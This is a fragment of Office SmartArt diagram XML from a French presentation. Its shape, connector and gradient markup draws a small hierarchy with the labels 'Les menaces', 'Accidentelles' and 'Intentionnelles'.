    <dgm:cxn modelId="{E9EEB518-8C85-4734-A4D5-CE1BE3809B4C}" type="presParOf" srcId="{FBCE44F1-6A71-4DD3-80C6-AEFF09F7E28E}" destId="{F3398953-CD98-4B82-832B-5A5E160C250B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{6C5C51BE-15D6-438E-BD6A-BC53C1355943}" type="presParOf" srcId="{FBCE44F1-6A71-4DD3-80C6-AEFF09F7E28E}" destId="{2349CB94-F1F2-4D9D-A3CC-FA731CCCD71A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{763DBFB1-A8EA-4B43-9465-D6657474C61C}" type="presParOf" srcId="{D8782786-7F38-48C6-BC5F-F7D9DE8349D8}" destId="{59994F58-FFDA-4F5D-861D-90A4651667CB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{BA524925-9103-4DC2-9A1C-BB2A965766CC}" type="presParOf" srcId="{D8782786-7F38-48C6-BC5F-F7D9DE8349D8}" destId="{BA6600F6-E99C-4190-8723-B147A25CEBCF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{14C31AA6-FE62-4109-9FCF-60755521E5A4}" type="presParOf" srcId="{BA6600F6-E99C-4190-8723-B147A25CEBCF}" destId="{BDC9FFF8-A8C0-407E-AA99-2B95CB69E473}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{0E3820D1-0E69-49DF-8D1C-714DE8B1874A}" type="presParOf" srcId="{BA6600F6-E99C-4190-8723-B147A25CEBCF}" destId="{EED914D0-5CB2-41C4-ABC4-2E86D13B4CE4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{1A238E3F-9AD2-460B-B27C-60FCC48EB46D}" type="presParOf" srcId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" destId="{B9A3B82B-FF69-4D50-AF52-579AB384566D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{833C4747-3DA0-4435-AF47-EC18F23E82DC}" type="presParOf" srcId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" destId="{1AAC5C3F-301F-483C-9BB4-4FCD66006B7E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{EDCC400F-FEB8-42D7-AD43-EE131C49450C}" type="presParOf" srcId="{1AAC5C3F-301F-483C-9BB4-4FCD66006B7E}" destId="{87699C69-64E6-48CB-874B-4376AFC271BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{B55A43B3-2AAE-4EBB-9501-7DC76EABA26F}" type="presParOf" srcId="{1AAC5C3F-301F-483C-9BB4-4FCD66006B7E}" destId="{567ED19B-51CF-41F3-87FD-2C12D458F045}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{FE758C43-4371-4860-8D13-250D36644A6A}" type="presParOf" srcId="{567ED19B-51CF-41F3-87FD-2C12D458F045}" destId="{D3FE403F-2753-47F2-A4FE-411C05F322F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{53089363-1BDC-486F-B921-F5164D6C936C}" type="presParOf" srcId="{567ED19B-51CF-41F3-87FD-2C12D458F045}" destId="{495BC297-6C22-4730-A9F1-18B2B73BE950}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{8DDC3922-7AD5-4453-8DB2-509D45F87E40}" type="presParOf" srcId="{495BC297-6C22-4730-A9F1-18B2B73BE950}" destId="{1ACDF8FA-4141-4148-9615-A5FA8A68B3EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{F43F6F1D-F5E2-4BE0-A94F-9F6D4A74834D}" type="presParOf" srcId="{495BC297-6C22-4730-A9F1-18B2B73BE950}" destId="{6B8B100E-CFAC-4E34-ADED-50E173B36441}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{F80E1021-556A-4947-AC53-CF7E7583BA91}" type="presParOf" srcId="{567ED19B-51CF-41F3-87FD-2C12D458F045}" destId="{27C3F04D-E00F-4DC4-87DE-6E08EA2ACAD1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{AF14731C-D109-4BB4-8AD4-80B870F36C2E}" type="presParOf" srcId="{567ED19B-51CF-41F3-87FD-2C12D458F045}" destId="{570969FD-FA6E-4303-83DD-3D1A134A40B0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{5DA295BF-5206-4FD5-A14B-81BC9B78AB75}" type="presParOf" srcId="{570969FD-FA6E-4303-83DD-3D1A134A40B0}" destId="{5DB4E6F2-CEA7-4B1F-84A4-B8F3413E819B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{15C73788-FDBA-417A-9CDF-BBEFE6370181}" type="presParOf" srcId="{570969FD-FA6E-4303-83DD-3D1A134A40B0}" destId="{332CDEA6-7913-4E7A-AE08-EE649FB68496}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{0BB51913-75C8-427B-B9D6-19ACABED9F3E}" type="presParOf" srcId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" destId="{CBB82E3A-2972-4968-9873-089649AE4944}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{9B943B1E-6B80-4662-BB10-34D8B5DCA5F3}" type="presParOf" srcId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" destId="{F361442D-5298-416E-83E8-6DCB5286ABAE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{6BC36D9E-F74B-45F9-85C1-E82F4D73B487}" type="presParOf" srcId="{F361442D-5298-416E-83E8-6DCB5286ABAE}" destId="{19B82C52-C414-4381-B295-3EA71A5EAFAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{07DC0605-AB83-49B9-850C-ED25683BB58E}" type="presParOf" srcId="{F361442D-5298-416E-83E8-6DCB5286ABAE}" destId="{BFCE0DF2-C9B1-4CF8-81E1-CEDB81F0CD8B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{6A62321B-77A2-49A2-B449-BA8D20C49106}" type="presParOf" srcId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" destId="{6CFE75AA-856E-4A5A-8F1B-28EDB8065F53}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{313EE329-EC4A-45CA-A0B7-2F4B6C6E3677}" type="presParOf" srcId="{25C65460-EC98-4987-A3A8-BBC81EBE37B1}" destId="{ADE89AE0-406A-45F9-B1B7-6FEC688423C9}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{F7688C26-8C39-41C6-810E-37BFBCF2D14C}" type="presParOf" srcId="{ADE89AE0-406A-45F9-B1B7-6FEC688423C9}" destId="{D0AC40A8-2AD6-4833-8B5A-11F62650729D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{DDAA5F70-24C6-4131-B0AD-93AD3CE0F49D}" type="presParOf" srcId="{ADE89AE0-406A-45F9-B1B7-6FEC688423C9}" destId="{EFBCF2ED-6DC2-47C7-969E-A1D116A0DAE2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy6"/>
    <dgm:cxn modelId="{B61CD19B-AE7B-48CB-94D5-72C62689EE8B}" type="presParOf" srcId="{11520D8F-F568-45C4-9A0D-CB80043B3C51}" destId="{AF53F7D4-50F0-49FB-B2C7-445E0D6AD4C4}"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6CF34-2E06-47DD-8393-5A2F896E37D1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558" y="1102522"/>
          <a:ext cx="2380784" cy="119039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fr-FR" sz="2900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Les menaces</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="35423" y="1137387"/>
        <a:ext cx="2311054" cy="1120662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{252327F4-7BF0-4579-A661-BB886A7FB9BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="2271110" y="1323927"/>
          <a:ext cx="1172778" cy="63105"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="31552"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1172778" y="315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828180" y="1326161"/>
        <a:ext cx="58638" cy="58638"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AAE471D5-0819-4B85-BA6D-ADDE97EA8393}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3333656" y="418046"/>
          <a:ext cx="2380784" cy="119039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fr-FR" sz="2900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Accidentelles</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3368521" y="452911"/>
        <a:ext cx="2311054" cy="1120662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F9CF5509-BA4E-41A4-8D2E-1670E2040EEC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="2271110" y="2008403"/>
          <a:ext cx="1172778" cy="63105"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="31552"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1172778" y="315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828180" y="2010636"/>
        <a:ext cx="58638" cy="58638"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EEEDA4D4-903A-47F5-A3E4-7E2DE2AB69EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3333656" y="1786997"/>
          <a:ext cx="2380784" cy="119039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fr-FR" sz="2900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Intentionnelles</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3368521" y="1821862"/>
        <a:ext cx="2311054" cy="1120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9A5F0-439D-4464-9B15-96B622EDA5A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2393590" y="4514459"/>
          <a:ext cx="85070" cy="85070"/>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F3F40B7-DCAE-410A-B08A-DB239E7B8CEF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2205007" y="4591102"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-525239"/>
                <a:satOff val="-731"/>
                <a:lumOff val="-280"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-525239"/>
                <a:satOff val="-731"/>
                <a:lumOff val="-280"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-525239"/>
                <a:satOff val="-731"/>
                <a:lumOff val="-280"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-525239"/>
              <a:satOff val="-731"/>
              <a:lumOff val="-28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2405C61-1B04-46F1-8F79-76B35B2378D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2012259" y="4654460"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1050478"/>
                <a:satOff val="-1461"/>
                <a:lumOff val="-560"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1050478"/>
                <a:satOff val="-1461"/>
                <a:lumOff val="-560"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1050478"/>
                <a:satOff val="-1461"/>
                <a:lumOff val="-560"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-1050478"/>
              <a:satOff val="-1461"/>
              <a:lumOff val="-56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9267856-9FE7-480C-BB94-192EB506871E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1816537" y="4703511"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1575717"/>
                <a:satOff val="-2192"/>
                <a:lumOff val="-840"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1575717"/>
                <a:satOff val="-2192"/>
                <a:lumOff val="-840"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-1575717"/>
                <a:satOff val="-2192"/>
                <a:lumOff val="-840"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-1575717"/>
              <a:satOff val="-2192"/>
              <a:lumOff val="-84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160232D-98F4-4E9E-8088-2669BE775D90}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3422768" y="3772558"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2100956"/>
                <a:satOff val="-2922"/>
                <a:lumOff val="-1121"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2100956"/>
                <a:satOff val="-2922"/>
                <a:lumOff val="-1121"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2100956"/>
                <a:satOff val="-2922"/>
                <a:lumOff val="-1121"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-2100956"/>
              <a:satOff val="-2922"/>
              <a:lumOff val="-112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BBF4DCA-081A-4CDE-8A4C-DF39BE680203}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3273448" y="3923800"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2626195"/>
                <a:satOff val="-3653"/>
                <a:lumOff val="-1401"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2626195"/>
                <a:satOff val="-3653"/>
                <a:lumOff val="-1401"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-2626195"/>
                <a:satOff val="-3653"/>
                <a:lumOff val="-1401"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-2626195"/>
              <a:satOff val="-3653"/>
              <a:lumOff val="-140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E288E09-0D46-460B-8ABE-28BE79C536CF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4040869" y="2852846"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-3151433"/>
                <a:satOff val="-4383"/>
                <a:lumOff val="-1681"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-3151433"/>
                <a:satOff val="-4383"/>
                <a:lumOff val="-1681"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-3151433"/>
                <a:satOff val="-4383"/>
                <a:lumOff val="-1681"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-3151433"/>
              <a:satOff val="-4383"/>
              <a:lumOff val="-168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2936928-A36F-434C-A4F1-A24CD37280CF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4372823" y="1732331"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">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w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-3676672"/>
              <a:satOff val="-5114"/>
              <a:lumOff val="-196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8E6382E-CD0A-4B45-B758-818A9E7A8B42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4206846" y="406924"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4201911"/>
                <a:satOff val="-5845"/>
                <a:lumOff val="-2241"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4201911"/>
                <a:satOff val="-5845"/>
                <a:lumOff val="-2241"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4201911"/>
                <a:satOff val="-5845"/>
                <a:lumOff val="-2241"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-4201911"/>
              <a:satOff val="-5845"/>
              <a:lumOff val="-224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5168A04-ACC0-47CD-9BCF-C1A66AD15D06}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4330585" y="311376"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4727150"/>
                <a:satOff val="-6575"/>
                <a:lumOff val="-2521"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4727150"/>
                <a:satOff val="-6575"/>
                <a:lumOff val="-2521"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4727150"/>
                <a:satOff val="-6575"/>
                <a:lumOff val="-2521"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-4727150"/>
              <a:satOff val="-6575"/>
              <a:lumOff val="-252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3EF8A76-86C0-4616-847B-FA439156B448}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4454325" y="215317"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5252389"/>
                <a:satOff val="-7306"/>
                <a:lumOff val="-2801"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5252389"/>
                <a:satOff val="-7306"/>
                <a:lumOff val="-2801"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5252389"/>
                <a:satOff val="-7306"/>
                <a:lumOff val="-2801"/>
                <a:alphaOff val="0"/>
                <a:lumMod val="99000"/>
                <a:satMod val="120000"/>
                <a:shade val="78000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
        </a:gradFill>
        <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="-5252389"/>
              <a:satOff val="-7306"/>
              <a:lumOff val="-280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AF7785C-7B84-4F40-972B-C623393FE6DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4578659" y="311376"/>
          <a:ext cx="85070" cy="85070"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5777628"/>
                <a:satOff val="-8036"/>
                <a:lumOff val="-3082"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent5">
                <a:hueOff val="-5777628"/>
                <a:satOff val="-8036"/>
